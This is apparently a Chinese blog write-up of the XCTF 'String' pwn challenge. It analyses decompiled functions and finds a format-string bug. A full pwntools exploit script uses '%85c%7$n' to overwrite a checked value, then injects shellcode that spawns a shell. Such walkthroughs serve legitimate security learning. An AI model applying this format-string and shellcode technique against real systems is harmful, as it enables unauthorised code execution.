跳到主要内容

「攻防世界」Pwn - String WriteUp

· 阅读需 5 分钟
Muel - Nova

写在开头的碎碎念

捏🐎咋这个Pwn这么难的啊,看WP也看不懂,即刻退出Pwn

说归说,至少先把这个攻防世界新手区给它干了

经过几天的并不系统的三天打鱼两天晒网的学习,现在只能说非常有自信。

String应该是攻防世界新手区里最有趣也最难的一题了,开整!

开整

分析

exeinfope

checksec

总而言之先扫一遍, 64bit没有PIE

先看看main

main

v4申请了一个8字节长的内存地址,保存的是68, 85两个数据,同时它把这两个数据的地址print了出来

跟进到sub_400D72()看看

sub_400D72()

让我们输入名字,但是下面对s的长度做了检测所以没办法溢出。

继续看看其他函数,首先是sub_400A7D()

sub_400A7D()

为了训练英语水平这里顺带打个翻译(?)

这是一个有名却分外不同寻常的小酒馆。这里空气清新,大理石铺成的地板也很干净。几乎看不到吵闹的客人,家具也没有被在这个世界的其他酒馆寻常可见的打架斗殴所损坏。装饰极其华丽,看着很适合摆在宫殿里,但在这个城市这却是极其平常的。房间中央是天鹅绒覆盖的椅子和长凳,有很大的橡木桌子围绕。一个大告示固定在一根木条后的北面的墙上。在一个角落你发现了一个壁炉。有两个明显的出口:向东,向上。但奇怪的是,并没有人在那,那么你要向哪里走呢?

这个背景不能说毫无吸引力只能说翻译了是纯纯浪费时间

我是傻宝

所以要我们给出选择:eastOrup

但是看下面的代码我们发现了:你只能选择east(选择了up之后你就会面临无尽之洞),继续接下来看sub_400BB9()

sub_400BB9()

这里提到了address,很容易联想到前面我们的v4,估计是要在v2和format做文章,但是具体怎么操作还不清楚,继续看sub_400CA6()

sub_400CA6()

这里的a1其实就是我们最开始的v4,所以我们需要让*v4 = v4[1]

注意下((void (__fastcall *)(_QWORD))v1)(0LL);这行,这里把v1转换成了可执行函数(void为返回值类型,__fastcall为协议),在这里我们就可以打shellcode了。

Payload

接下来就是如何实现的问题了。

先把前面几个固定步骤的写了

exp_01

这里就需要引入格式化字符串的漏洞,传送门

我们需要找一下v4所在的参数位置,传入payload

payload = 'AAAA'+'.%x'*10

addr_info

可以看到我们的41414141位于栈内第八个位置,而我们刚才写入的v4_addr是位于前一个位置的,此时

就可以构造payload使得*v4=85了

payload = '%85c%7$n'

return_0

这时候我们已经满足sub_400CA6()中的条件了,那么只需要轻松写入一个shellcode,就可以拿到shell了。

完整payload:

from pwn import *
context(log_level='debug')

sh = process('./1d3c852354df4609bf8e56fe8e9df316')

sh.recvuntil('secret[0] is ')
v4_addr = int(sh.recvuntil('\n')[:-1], 16)
print(v4_addr)

sh.recvuntil('be:')
sh.sendline(b'yuusya')
sh.sendlineafter('east or up?:\n', b'east')
sh.sendlineafter('leave(0)?:\n', b'1')

# *v4 = 85
sh.sendlineafter("address'\n", str(v4_addr))
payload = '%85c%7$n'
sh.sendline(payload)
sh.recvuntil('I hear it')
context(arch='amd64', os='linux')
sh.sendlineafter('SPELL', asm(shellcraft.sh()))
sh.interactive()
Loading Comments...